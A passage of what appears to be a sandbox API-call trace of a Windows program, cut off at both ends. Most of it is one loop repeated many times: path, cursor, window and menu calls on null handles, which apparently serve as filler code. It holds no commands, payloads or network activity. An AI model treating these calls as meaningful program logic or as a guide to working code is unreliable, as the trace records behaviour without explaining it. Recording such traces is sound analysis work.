Size=0x20) returned 0x1ce1320 [0027.353] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.353] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.353] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.353] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.353] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.353] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.353] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.353] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.353] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce1310 [0027.353] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce1320 [0027.353] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1348 [0027.353] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce1360 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1348 | out: hHeap=0x1ce0000) returned 1 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1360 | out: hHeap=0x1ce0000) returned 1 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1320 | out: hHeap=0x1ce0000) returned 1 [0027.353] MoveToEx (in: hdc=0x1, x=100, y=0, lppt=0x0 | out: lppt=0x0) returned 0 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce1310 | out: hHeap=0x1ce0000) returned 1 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce12f8 | out: hHeap=0x1ce0000) returned 1 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce12d0 | out: hHeap=0x1ce0000) returned 1 [0027.353] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce12c0 | out: hHeap=0x1ce0000) returned 1 [0027.353] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce12c0 [0027.354] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce12d0 [0027.354] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce12f8 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.355] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] PathUnquoteSpacesA (in: lpsz="" | out: lpsz="") returned 0 [0027.356] GetStockObject (i=6) returned 0x1b00018 [0027.356] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.356] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.356] PathFileExistsW (pszPath=0x0) returned 0 [0027.356] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.356] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.356] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.356] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.357] GetMenu (hWnd=0x0) returned 0x0 [0027.357] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.357] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.357] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.357] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.357] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.357] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.357] GetStockObject (i=6) returned 0x1b00018 [0027.357] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.357] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.357] PathFileExistsW (pszPath=0x0) returned 0 [0027.357] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.358] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.358] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.358] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.358] GetMenu (hWnd=0x0) returned 0x0 [0027.358] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.358] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.358] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.358] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.358] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.358] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.358] GetStockObject (i=6) returned 0x1b00018 [0027.358] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.358] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.358] PathFileExistsW (pszPath=0x0) returned 0 [0027.358] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.358] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.358] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.358] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.358] GetMenu (hWnd=0x0) returned 0x0 [0027.358] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.358] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.358] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.358] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.358] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.358] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.358] GetStockObject (i=6) returned 0x1b00018 [0027.358] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.359] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.359] PathFileExistsW (pszPath=0x0) returned 0 [0027.359] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.359] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.359] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.359] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.359] GetMenu (hWnd=0x0) returned 0x0 [0027.359] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.359] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.359] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.359] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.359] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.359] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.359] GetStockObject (i=6) returned 0x1b00018 [0027.359] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.359] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.359] PathFileExistsW (pszPath=0x0) returned 0 [0027.359] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.359] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.359] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.359] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.359] GetMenu (hWnd=0x0) returned 0x0 [0027.359] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x140) returned -1 [0027.359] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.359] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.359] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.359] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.360] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.360] GetStockObject (i=6) returned 0x1b00018 [0027.360] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.360] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.360] PathFileExistsW (pszPath=0x0) returned 0 [0027.360] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.360] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.360] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.360] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.360] GetMenu (hWnd=0x0) returned 0x0 [0027.360] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.360] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.360] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.360] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.360] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.360] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.360] GetStockObject (i=6) returned 0x1b00018 [0027.360] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.360] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.360] PathFileExistsW (pszPath=0x0) returned 0 [0027.360] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.360] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.360] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.360] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.360] GetMenu (hWnd=0x0) returned 0x0 [0027.360] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.361] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.361] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.361] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.361] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.361] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.361] GetStockObject (i=6) returned 0x1b00018 [0027.361] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.361] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.361] PathFileExistsW (pszPath=0x0) returned 0 [0027.361] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.361] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.361] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.361] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.361] GetMenu (hWnd=0x0) returned 0x0 [0027.361] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.361] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.361] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.361] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.361] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.361] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.361] GetStockObject (i=6) returned 0x1b00018 [0027.361] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.361] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.361] PathFileExistsW (pszPath=0x0) returned 0 [0027.361] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.361] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.362] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.362] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.362] GetMenu (hWnd=0x0) returned 0x0 [0027.362] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.362] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.362] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.362] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.362] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.362] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.362] GetStockObject (i=6) returned 0x1b00018 [0027.362] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.362] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.362] PathFileExistsW (pszPath=0x0) returned 0 [0027.362] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.362] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.362] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.362] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.362] GetMenu (hWnd=0x0) returned 0x0 [0027.362] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1a8) returned -1 [0027.362] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.362] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.362] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.362] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.362] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.362] GetStockObject (i=6) returned 0x1b00018 [0027.362] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.362] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.362] PathFileExistsW (pszPath=0x0) returned 0 [0027.363] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.363] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.363] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.363] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.363] GetMenu (hWnd=0x0) returned 0x0 [0027.363] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.363] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.363] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.363] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.363] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.363] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.363] GetStockObject (i=6) returned 0x1b00018 [0027.363] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.363] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.363] PathFileExistsW (pszPath=0x0) returned 0 [0027.363] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.363] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.363] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.363] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.363] GetMenu (hWnd=0x0) returned 0x0 [0027.363] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.363] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.363] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.363] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.363] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.363] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.363] GetStockObject (i=6) returned 0x1b00018 [0027.364] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.364] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.364] PathFileExistsW (pszPath=0x0) returned 0 [0027.364] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.364] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.364] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.364] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.364] GetMenu (hWnd=0x0) returned 0x0 [0027.364] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.364] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.364] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.364] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.364] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.364] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.364] GetStockObject (i=6) returned 0x1b00018 [0027.364] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.364] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.364] PathFileExistsW (pszPath=0x0) returned 0 [0027.364] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.364] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.364] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.364] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.364] GetMenu (hWnd=0x0) returned 0x0 [0027.364] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.364] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.364] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.364] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.365] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.365] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.365] GetStockObject (i=6) returned 0x1b00018 [0027.365] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.365] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.365] PathFileExistsW (pszPath=0x0) returned 0 [0027.365] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.365] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.365] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.365] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.365] GetMenu (hWnd=0x0) returned 0x0 [0027.365] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3e9) returned -1 [0027.365] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.365] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.365] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.365] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.365] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.365] GetStockObject (i=6) returned 0x1b00018 [0027.365] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: 